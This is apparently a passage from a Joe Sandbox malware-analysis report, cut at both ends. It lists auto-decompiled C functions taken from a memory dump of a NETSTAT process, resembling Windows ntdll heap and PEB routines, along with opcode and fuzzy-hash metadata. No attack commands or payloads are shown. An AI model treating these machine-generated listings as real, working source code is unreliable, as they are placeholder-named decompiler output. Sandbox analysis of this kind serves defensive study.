                                      				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                      				 *_t70 = _t73;
                                      				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                      				return 0;
                                      			}



























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 59%
                                      			E02E93B7A(void* __ecx) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr _v20;
                                      				intOrPtr _t17;
                                      				intOrPtr _t26;
                                      				void* _t35;
                                      				void* _t38;
                                      				void* _t41;
                                      				intOrPtr _t44;
                                      
                                      				_t17 =  *0x2f584c4; // 0x0
                                      				_v12 = 1;
                                      				_v8 =  *0x2f584c0 * 0x4c;
                                      				_t41 = __ecx;
                                      				_t35 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2f584c0 * 0x4c);
                                      				if(_t35 == 0) {
                                      					_t44 = 0xc0000017;
                                      				} else {
                                      					_push( &_v8);
                                      					_push(_v8);
                                      					_push(_t35);
                                      					_push(4);
                                      					_push( &_v12);
                                      					_push(0x6b);
                                      					_t44 = E02EAAA90();
                                      					_v20 = _t44;
                                      					if(_t44 >= 0) {
                                      						E02EAFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2f584c0 * 0xc);
                                      						_t38 = _t35;
                                      						if(_t35 < _v8 + _t35) {
                                      							do {
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                      							} while (_t38 < _v8 + _t35);
                                      							_t44 = _v20;
                                      						}
                                      					}
                                      					_t26 =  *0x2f584c4; // 0x0
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                      				}
                                      				return _t44;
                                      			}













                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E02EE6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v28;
                                      				char _v36;
                                      				char _v52;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed char* _t21;
                                      				void* _t24;
                                      				void* _t36;
                                      				void* _t38;
                                      				void* _t46;
                                      
                                      				_push(_t36);
                                      				_t46 = __edx;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				if(E02E87D50() == 0) {
                                      					_t21 = 0x7ffe0384;
                                      				} else {
                                      					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                      				}
                                      				if( *_t21 != 0) {
                                      					_t21 =  *[fs:0x30];
                                      					if((_t21[0x240] & 0x00000004) != 0) {
                                      						if(E02E87D50() == 0) {
                                      							_t21 = 0x7ffe0385;
                                      						} else {
                                      							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                      						}
                                      						if(( *_t21 & 0x00000020) != 0) {
                                      							_t56 = _t46;
                                      							if(_t46 == 0) {
                                      								_t46 = 0x2e45c80;
                                      							}
                                      							_push(_t46);
                                      							_push( &_v12);
                                      							_t24 = E02E9F6E0(_t36, 0, _t46, _t56);
                                      							_push(_a4);
                                      							_t38 = _t24;
                                      							_push( &_v28);
                                      							_t21 = E02E9F6E0(_t38, 0, _t46, _t56);
                                      							if(_t38 != 0) {
                                      								if(_t21 != 0) {
                                      									E02EE7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                      									L02E82400( &_v52);
                                      								}
                                      								_t21 = L02E82400( &_v28);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t21;
                                      			}




















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E02F3070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                      				char _v8;
                                      				intOrPtr _v11;
                                      				signed int _v12;
                                      				intOrPtr _v15;
                                      				signed int _v16;
                                      				intOrPtr _v28;
                                      				void* __ebx;
                                      				char* _t32;
                                      				signed int* _t38;
                                      				signed int _t60;
                                      
                                      				_t38 = __ecx;
                                      				_v16 = __edx;
                                      				_t60 = E02F307DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                      				if(_t60 != 0) {
                                      					_t7 = _t38 + 0x38; // 0x29cd5903
                                      					_push( *_t7);
                                      					_t9 = _t38 + 0x34; // 0x6adeeb00
                                      					_push( *_t9);
                                      					_v12 = _a8 << 0xc;
                                      					_t11 = _t38 + 4; // 0x5de58b5b
                                      					_push(0x4000);
                                      					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                      					E02F2AFDE( &_v8,  &_v12);
                                      					E02F31293(_t38, _v28, _t60);
                                      					if(E02E87D50() == 0) {
                                      						_t32 = 0x7ffe0380;
                                      					} else {
                                      						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      					}
                                      					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                      						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                      						E02F214FB(_t38,  *_t21, _v11, _v15, 0xd);
                                      					}
                                      				}
                                      				return  ~_t60;
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E02E8AE73(intOrPtr __ecx, void* __edx) {
                                      				intOrPtr _v8;
                                      				void* _t19;
                                      				char* _t22;
                                      				signed char* _t24;
                                      				intOrPtr _t25;
                                      				intOrPtr _t27;
                                      				void* _t31;
                                      				intOrPtr _t36;
                                      				char* _t38;
                                      				signed char* _t42;
                                      
                                      				_push(__ecx);
                                      				_t31 = __edx;
                                      				_v8 = __ecx;
                                      				_t19 = E02E87D50();
                                      				_t38 = 0x7ffe0384;
                                      				if(_t19 != 0) {
                                      					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      				} else {
                                      					_t22 = 0x7ffe0384;
                                      				}
                                      				_t42 = 0x7ffe0385;
                                      				if( *_t22 != 0) {
                                      					if(E02E87D50() == 0) {
                                      						_t24 = 0x7ffe0385;
                                      					} else {
                                      						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      					}
                                      					if(( *_t24 & 0x00000010) != 0) {
                                      						goto L17;
                                      					} else {
                                      						goto L3;
                                      					}
                                      				} else {
                                      					L3:
                                      					_t27 = E02E87D50();
                                      					if(_t27 != 0) {
                                      						_t27 =  *[fs:0x30];
                                      						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                      					}
                                      					if( *_t38 != 0) {
                                      						_t27 =  *[fs:0x30];
                                      						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                      							goto L5;
                                      						}
                                      						_t27 = E02E87D50();
                                      						if(_t27 != 0) {
                                      							_t27 =  *[fs:0x30];
                                      							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                      						}
                                      						if(( *_t42 & 0x00000020) != 0) {
                                      							L17:
                                      							_t25 = _v8;
                                      							_t36 = 0;
                                      							if(_t25 != 0) {
                                      								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                      							}
                                      							_t27 = E02EE7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                      						}
                                      						goto L5;
                                      					} else {
                                      						L5:
                                      						return _t27;
                                      					}
                                      				}
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction ID: fc21c83b645f48fd87570655811364c836e8f8f152b239efe3955522c91f6b5d
                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction Fuzzy Hash: D7212936681680CFD721AB64C944B6577E5EF01348F19A0B1EE8C8B3D2E734DC82C790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E02EE7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _t21;
                                      				void* _t24;
                                      				intOrPtr _t25;
                                      				void* _t36;
                                      				short _t39;
                                      				signed char* _t42;
                                      				unsigned int _t46;
                                      				void* _t50;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t21 =  *0x2f57b9c; // 0x0
                                      				_t46 = _a8;
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				_t4 = _t46 + 0x2e; // 0x2e
                                      				_t36 = _t4;
                                      				_t24 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                      				_t50 = _t24;
                                      				if(_t50 != 0) {
                                      					_t25 = _a4;
                                      					if(_t25 == 5) {
                                      						L3:
                                      						_t39 = 0x14b1;
                                      					} else {
                                      						_t39 = 0x14b0;
                                      						if(_t25 == 6) {
                                      							goto L3;
                                      						}
                                      					}
                                      					 *((short*)(_t50 + 6)) = _t39;
                                      					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                      					_t11 = _t50 + 0x2c; // 0x2c
                                      					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                      					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                      					E02EAF3E0(_t11, _a12, _t46);
                                      					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                      					if(E02E87D50() == 0) {
                                      						_t42 = 0x7ffe0384;
                                      					} else {
                                      						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      					}
                                      					_push(_t50);
                                      					_t19 = _t36 - 0x20; // 0xe
                                      					_push(0x403);
                                      					_push( *_t42 & 0x000000ff);
                                      					E02EA9AE0();
                                      					_t24 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                      				}
                                      				return _t24;
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8ebdc233981a7b7d7c58a5e180e98ec57165c33dc161b8177e37ca8a7188611c
                                      • Instruction ID: 2dc0117fcc447883a017eb1391f989c914cf64617895a88b1a6c7039fb807aa3
                                      • Opcode Fuzzy Hash: 8ebdc233981a7b7d7c58a5e180e98ec57165c33dc161b8177e37ca8a7188611c
                                      • Instruction Fuzzy Hash: 6E21A172940614AFCB25DFA9D890E6BB7A9EF48340F10856DF51AC7750E734E900CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E02E9FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				intOrPtr _v8;
                                      				void* _t19;
                                      				intOrPtr _t29;
                                      				intOrPtr _t32;
                                      				intOrPtr _t35;
                                      				intOrPtr _t37;
                                      				intOrPtr* _t40;
                                      
                                      				_t35 = __edx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t37 = 0;
                                      				_v8 = __edx;
                                      				_t29 = __ecx;
                                      				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                      					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                      					L3:
                                      					_t19 = _a4 - 4;
                                      					if(_t19 != 0) {
                                      						if(_t19 != 1) {
                                      							L7:
                                      							return _t37;
                                      						}
                                      						if(_t35 == 0) {
                                      							L11:
                                      							_t37 = 0xc000000d;
                                      							goto L7;
                                      						}
                                      						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                      							_t35 = _v8;
                                      						}
                                      						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                      						goto L7;
                                      					}
                                      					if(_t29 == 0) {
                                      						goto L11;
                                      					}
                                      					_t32 =  *_t40;
                                      					if(_t32 != 0) {
                                      						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                      						E02E776E2( *_t40);
                                      					}
                                      					 *_t40 = _t29;
                                      					goto L7;
                                      				}
                                      				_t40 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                      				if(_t40 == 0) {
                                      					_t37 = 0xc0000017;
                                      					goto L7;
                                      				}
                                      				_t35 = _v8;
                                      				 *_t40 = 0;
                                      				 *((intOrPtr*)(_t40 + 4)) = 0;
                                      				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                      				goto L3;
                                      			}











                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction ID: b463355dab4d23d34a6a05f4723cf604470a8d93b7a72518d5f85f17c80cc3c5
                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction Fuzzy Hash: F2217972A80A40DFCB31CF49C540BA6F7E9EB99B18F24D16EE949C7A10D730AC40CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E02E69240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t33;
                                      				intOrPtr _t37;
                                      				intOrPtr _t41;
                                      				intOrPtr* _t46;
                                      				void* _t48;
                                      				intOrPtr _t50;
                                      				intOrPtr* _t60;
                                      				void* _t61;
                                      				intOrPtr _t62;
                                      				intOrPtr _t65;
                                      				void* _t66;
                                      				void* _t68;
                                      
                                      				_push(0xc);
                                      				_push(0x2f3f708);
                                      				E02EBD08C(__ebx, __edi, __esi);
                                      				_t65 = __ecx;
                                      				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                      				if( *(__ecx + 0x24) != 0) {
                                      					_push( *(__ecx + 0x24));
                                      					E02EA95D0();
                                      					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                      				}
                                      				L6();
                                      				L6();
                                      				_push( *((intOrPtr*)(_t65 + 0x28)));
                                      				E02EA95D0();
                                      				_t33 =  *0x2f584c4; // 0x0
                                      				L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                      				_t37 =  *0x2f584c4; // 0x0
                                      				L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                      				_t41 =  *0x2f584c4; // 0x0
                                      				E02E82280(L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2f586b4);
                                      				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                      				_t46 = _t65 + 0xe8;
                                      				_t62 =  *_t46;
                                      				_t60 =  *((intOrPtr*)(_t46 + 4));
                                      				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                      					_t61 = 3;
                                      					asm("int 0x29");
                                      					_push(_t65);
                                      					_t66 = _t61;
                                      					_t23 = _t66 + 0x14; // 0x8df8084c
                                      					_push( *_t23);
                                      					E02EA95D0();
                                      					_t24 = _t66 + 0x10; // 0x89e04d8b
                                      					_push( *_t24);
                                      					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                      					_t48 = E02EA95D0();
                                      					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                      					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                      					return _t48;
                                      				} else {
                                      					 *_t60 = _t62;
                                      					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                      					 *(_t68 - 4) = 0xfffffffe;
                                      					E02E69325();
                                      					_t50 =  *0x2f584c4; // 0x0
                                      					return E02EBD0D1(L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                      				}
                                      			}
















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 87aed7c122c9c8a04a0b77229d04453c5f45795bcd9fbe98223ee210cf86f761
                                      • Instruction ID: 5d3f040b38fdc5ed1273eba2a33c1b83ff3e5d112b150e2990d05f98f93e0f0d
                                      • Opcode Fuzzy Hash: 87aed7c122c9c8a04a0b77229d04453c5f45795bcd9fbe98223ee210cf86f761
                                      • Instruction Fuzzy Hash: 012145314C0640DFC722EF28CA00F6AB7FABF08784F149568A14A976A2CB35E991CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E02E9B390(void* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				signed char _t12;
                                      				signed int _t16;
                                      				signed int _t21;
                                      				void* _t28;
                                      				signed int _t30;
                                      				signed int _t36;
                                      				signed int _t41;
                                      
                                      				_push(__ecx);
                                      				_t41 = _a4 + 0xffffffb8;
                                      				E02E82280(_t12, 0x2f58608);
                                      				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                      				asm("sbb edi, edi");
                                      				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                      				_v8 = _t36;
                                      				asm("lock cmpxchg [ebx], ecx");
                                      				_t30 = 1;
                                      				if(1 != 1) {
                                      					while(1) {
                                      						_t21 = _t30 & 0x00000006;
                                      						_t16 = _t30;
                                      						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                      						asm("lock cmpxchg [edi], esi");
                                      						if(_t16 == _t30) {
                                      							break;
                                      						}
                                      						_t30 = _t16;
                                      					}
                                      					_t36 = _v8;
                                      					if(_t21 == 2) {
                                      						_t16 = E02EA00C2(0x2f58608, 0, _t28);
                                      					}
                                      				}
                                      				if(_t36 != 0) {
                                      					_t16 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                      				}
                                      				return _t16;
                                      			}












                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c872f2399b52dc13f4f809ed10eb52f191734b4f80247dd668d15d17fc1c7c9
                                      • Instruction ID: eaf4652e8df0a45154eb51ac587fea9e96565b478a8aab2555c9778f0ab855cf
                                      • Opcode Fuzzy Hash: 1c872f2399b52dc13f4f809ed10eb52f191734b4f80247dd668d15d17fc1c7c9
                                      • Instruction Fuzzy Hash: 9D116B333911209FCB18DA14DD81A6F7697EBC5374B24A13EEE1AC7380CA31AD02CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E02EF4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr* _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr* _t27;
                                      				intOrPtr* _t30;
                                      				intOrPtr* _t31;
                                      				intOrPtr _t33;
                                      				intOrPtr* _t34;
                                      				intOrPtr* _t35;
                                      				void* _t37;
                                      				void* _t38;
                                      				void* _t39;
                                      				void* _t43;
                                      
                                      				_t39 = __eflags;
                                      				_t35 = __edi;
                                      				_push(8);
                                      				_push(0x2f408d0);
                                      				E02EBD08C(__ebx, __edi, __esi);
                                      				_t37 = __ecx;
                                      				E02EF41E8(__ebx, __edi, __ecx, _t39);
                                      				E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                      				_t18 = _t37 + 8;
                                      				_t33 =  *_t18;
                                      				_t27 =  *((intOrPtr*)(_t18 + 4));
                                      				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                      					L8:
                                      					_push(3);
                                      					asm("int 0x29");
                                      				} else {
                                      					 *_t27 = _t33;
                                      					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                      					_t35 = 0x2f587e4;
                                      					_t18 =  *0x2f587e0; // 0x0
                                      					while(_t18 != 0) {
                                      						_t43 = _t18 -  *0x2f55cd0; // 0xffffffff
                                      						if(_t43 >= 0) {
                                      							_t31 =  *0x2f587e4; // 0x0
                                      							_t18 =  *_t31;
                                      							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                      								goto L8;
                                      							} else {
                                      								 *0x2f587e4 = _t18;
                                      								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                      								L02E67055(_t31 + 0xfffffff8);
                                      								_t24 =  *0x2f587e0; // 0x0
                                      								_t18 = _t24 - 1;
                                      								 *0x2f587e0 = _t18;
                                      								continue;
                                      							}
                                      						}
                                      						goto L9;
                                      					}
                                      				}
                                      				L9:
                                      				__eflags =  *0x2f55cd0;
                                      				if( *0x2f55cd0 <= 0) {
                                      					L02E67055(_t37);
                                      				} else {
                                      					_t30 = _t37 + 8;
                                      					_t34 =  *0x2f587e8; // 0x0
                                      					__eflags =  *_t34 - _t35;
                                      					if( *_t34 != _t35) {
                                      						goto L8;
                                      					} else {
                                      						 *_t30 = _t35;
                                      						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                      						 *_t34 = _t30;
                                      						 *0x2f587e8 = _t30;
                                      						 *0x2f587e0 = _t18 + 1;
                                      					}
                                      				}
                                      				 *(_t38 - 4) = 0xfffffffe;
                                      				return E02EBD0D1(L02EF4320());
                                      			}
















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 271d65d25895171319881a1ea0a7872bb171ddfeea9280c8f124b2de5f1ac260
                                      • Instruction ID: 11ffa473d547d42ebddafadbd3d891c1081791d5f96563afc9db1146548a607d
                                      • Opcode Fuzzy Hash: 271d65d25895171319881a1ea0a7872bb171ddfeea9280c8f124b2de5f1ac260
                                      • Instruction Fuzzy Hash: 712158709C1718CFD795EF28E100A56BBF2FB85398B50EAAAD3098B290DB359491CF00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 25%
                                      			E02E92397(intOrPtr _a4) {
                                      				void* __ebx;
                                      				void* __ecx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t11;
                                      				void* _t19;
                                      				void* _t25;
                                      				void* _t26;
                                      				intOrPtr _t27;
                                      				void* _t28;
                                      				void* _t29;
                                      
                                      				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                      				if( *0x2f5848c != 0) {
                                      					L02E8FAD0(0x2f58610);
                                      					if( *0x2f5848c == 0) {
                                      						E02E8FA00(0x2f58610, _t19, _t27, 0x2f58610);
                                      						goto L1;
                                      					} else {
                                      						_push(0);
                                      						_push(_a4);
                                      						_t26 = 4;
                                      						_t29 = E02E92581(0x2f58610, 0x2e450a0, _t26, _t27, _t28);
                                      						E02E8FA00(0x2f58610, 0x2e450a0, _t27, 0x2f58610);
                                      					}
                                      				} else {
                                      					L1:
                                      					_t11 =  *0x2f58614; // 0x1
                                      					if(_t11 == 0) {
                                      						_t11 = E02EA4886(0x2e41088, 1, 0x2f58614);
                                      					}
                                      					_push(0);
                                      					_push(_a4);
                                      					_t25 = 4;
                                      					_t29 = E02E92581(0x2f58610, (_t11 << 4) + 0x2e45070, _t25, _t27, _t28);
                                      				}
                                      				if(_t29 != 0) {
                                      					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                      					 *((char*)(_t29 + 0x40)) = 0;
                                      				}
                                      				return _t29;
                                      			}
















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ddc3a75670e0c274ea6bdf60c47f92dbcd4e1146b77b0579c7328b8a435463f
                                      • Instruction ID: 34830824247e3ce0357ca410ccace4783dc891a9bd4fd3aa1f8fea06bcbac6e9
                                      • Opcode Fuzzy Hash: 1ddc3a75670e0c274ea6bdf60c47f92dbcd4e1146b77b0579c7328b8a435463f
                                      • Instruction Fuzzy Hash: 8C1108316C031177DF20E629AC80B16B6C9ABA07A4F54E427FF06AB190CAB0E841CE54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E02EE46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                      				signed short* _v8;
                                      				unsigned int _v12;
                                      				intOrPtr _v16;
                                      				signed int _t22;
                                      				signed char _t23;
                                      				short _t32;
                                      				void* _t38;
                                      				char* _t40;
                                      
                                      				_v12 = __edx;
                                      				_t29 = 0;
                                      				_v8 = __ecx;
                                      				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
